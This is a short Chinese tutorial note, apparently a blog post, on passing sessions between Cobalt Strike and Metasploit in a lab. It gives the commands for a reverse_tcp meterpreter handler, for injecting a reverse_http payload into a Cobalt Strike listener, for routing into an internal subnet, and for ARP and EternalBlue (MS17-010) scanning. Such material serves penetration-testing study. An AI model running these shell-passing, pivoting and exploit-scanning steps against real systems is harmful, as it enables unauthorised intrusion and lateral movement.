CS与MSF联动

前言

  以前在学习CS的时候,就用过CS与MSF互传shell。正好今天看到安恒红皮书上,有更详细的操作,也顺便做个记录。

CS派生MSF

  当CobaltStrike获得了一个上线机器,想把这个目标传给Metasploit中的meterpreter,获得一个session进行控制。在Metasploit执行以下命令

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.16.122.240
set lport 4454
run

  
  CS创建一个Listeners为windows/foreign/reverse_tcp,注意我这里的CS是3.13版本,4.x版本不一样。IP是MSF监听IP,端口为MSF监听端口。
  
  选中靶机,右键选择Spawn,选择刚刚创建好的listener,点击choose
  
  此时,msf成功得到会话
  

MSF派生CS

  cs创建一个listener为windows/beacon_http/reverse_http,host为cs主机的IP,创建好后便监听8884端口。
  
  msf输入以下命令

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http # 与cs的监听器类型一致
set lhost 10.16.122.240 # 为cs的ip
set lport 8884 # cs监听的端口
# 默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个
set disablepayloadhandler true
set session 1
run

  cs成功收到会话
  

添加路由

  为了能够访问内网,需要添加代理或者路由操作,msf执行run get_local_subnets,得到两个网卡一个是外网,一个是内网。
  

run autoroute -s 192.168.126.0/24 # 添加内网路由
run autoroute -p # 显示路由

  
  可以先做个主机存活探测

run arp_scanner -r 192.168.126.0/24

  
  使用background,回到msf的界面,使用auxiliary/scanner/smb/smb_ms17_010,探测是否存在永恒之蓝。
  
  我在这里并没有使用cs的proxy pivots功能,我发现msf的流量根本不能走cs的代理,网上查了查说是msf的bug。。。

查看评论 -
评论